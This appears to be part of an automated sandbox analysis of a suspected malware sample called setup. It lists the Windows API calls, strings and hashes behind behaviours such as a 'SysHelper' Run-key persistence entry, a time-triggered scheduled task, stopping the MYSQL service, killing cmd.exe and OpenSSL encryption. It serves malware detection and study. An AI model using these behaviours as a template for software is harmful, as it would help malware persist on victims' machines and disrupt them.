                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                • lstrcatW.KERNEL32(?), ref: 00411C44
                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                • String ID: \shell32.dll
                • API String ID: 679253221-3783449302
                • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                APIs
                • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                • GetDesktopWindow.USER32 ref: 004549FB
                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                • _wcsstr.LIBCMT ref: 00454A8A
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: Service-0x$_OPENSSL_isservice
                • API String ID: 2112994598-1672312481
                • Opcode ID: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
                • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                • Opcode Fuzzy Hash: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
                • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                APIs
                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                • GetFileType.KERNEL32(00000000), ref: 00454B05
                • __vfwprintf_p.LIBCMT ref: 00454B27
                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                • vswprintf.LIBCMT ref: 00454B5D
                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                • String ID: OPENSSL$OpenSSL: FATAL
                • API String ID: 277090408-1348657634
                • Opcode ID: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
                • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                • Opcode Fuzzy Hash: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
                • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                • _memset.LIBCMT ref: 004123B6
                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                • GetCommandLineW.KERNEL32 ref: 004123F4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                Strings
                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                • SysHelper, xrefs: 004123D6
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                • API String ID: 122392481-4165002228
                • Opcode ID: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
                • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                • Opcode Fuzzy Hash: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
                • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                • String ID:
                • API String ID: 1077091919-0
                • Opcode ID: 3df0a3d7aa0a5bea6e9efe659876c07eb892ef20087b1bab8181f85f0bce5c2d
                • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                • Opcode Fuzzy Hash: 3df0a3d7aa0a5bea6e9efe659876c07eb892ef20087b1bab8181f85f0bce5c2d
                • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
                • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                • Opcode Fuzzy Hash: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
                • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                • _memset.LIBCMT ref: 0040DC38
                • CoUninitialize.OLE32 ref: 0040DC92
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                • String ID: --Task$Comment$Time Trigger Task
                • API String ID: 330603062-1376107329
                • Opcode ID: 2e74f348d978aa6d86d7a4bcf4ad75af8e5eec8b3156eaf57847e3efada330f4
                • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                • Opcode Fuzzy Hash: 2e74f348d978aa6d86d7a4bcf4ad75af8e5eec8b3156eaf57847e3efada330f4
                • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                • Sleep.KERNEL32(?), ref: 00411A75
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                • String ID: MYSQL
                • API String ID: 2359367111-1651825290
                • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                APIs
                • std::exception::exception.LIBCMT ref: 0044F27F
                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                • __CxxThrowException@8.LIBCMT ref: 0044F294
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                • std::exception::exception.LIBCMT ref: 0044F2AD
                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                • std::exception::exception.LIBCMT ref: 0044F2FB
                • __CxxThrowException@8.LIBCMT ref: 0044F310
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                • String ID: bad function call
                • API String ID: 2464034642-3612616537
                • Opcode ID: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
                • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                • Opcode Fuzzy Hash: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
                • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                APIs
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                • API String ID: 1717984340-2085858615
                • Opcode ID: 73675a20a9300cbfb3356ca09084d0b3dfcbde4a4269266388fce0caa3adac80
                • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                • Opcode Fuzzy Hash: 73675a20a9300cbfb3356ca09084d0b3dfcbde4a4269266388fce0caa3adac80
                • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                • String ID: cmd.exe
                • API String ID: 2696918072-723907552
                • Opcode ID: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                • Opcode Fuzzy Hash: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID: &#160;$Error encrypting message: %s$\\n
                • API String ID: 1783060780-3771355929
                • Opcode ID: 3dd751b55826294964085055a71ea3811957cd0e16fa9190f0f9ac0a9f57f753
                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                • Opcode Fuzzy Hash: 3dd751b55826294964085055a71ea3811957cd0e16fa9190f0f9ac0a9f57f753
                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                • API String ID: 909875538-2908105608
                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __aulldvrm
                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                • API String ID: 1302938615-3129329331
                • Opcode ID: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                • Opcode Fuzzy Hash: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                APIs
                • __lock.LIBCMT ref: 0042594A
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22
                • _free.LIBCMT ref: 00425970
                  • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13
                • __lock.LIBCMT ref: 00425989
                • ___removelocaleref.LIBCMT ref: 00425998
                • ___freetlocinfo.LIBCMT ref: 004259B1
                • _free.LIBCMT ref: 004259C4
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                • String ID:
                • API String ID: 626533743-0
                • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                APIs
                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ___from_strstr_to_strchr
                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                • API String ID: 601868998-2416195885
                • Opcode ID: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                • Opcode Fuzzy Hash: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$g9F
                • API String ID: 2102423945-3653307630
                • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                APIs
                • __getptd_noexit.LIBCMT ref: 004C5D3D
                  • Part of subcall function 0042501F: GetLastError.KERNEL32(00000001,00000000,0042520D,00420CE9,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425021
                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425083
                • __calloc_crt.LIBCMT ref: 004C5D60
                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 3123740607-798102604
                • Opcode ID: b00946c8ecf08a401a747019ed9ef378322b2d001c3f0cfd34f22b2a971cc007
                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                • Opcode Fuzzy Hash: b00946c8ecf08a401a747019ed9ef378322b2d001c3f0cfd34f22b2a971cc007
                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _fprintf_memset
                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                • API String ID: 3021507156-3399676524
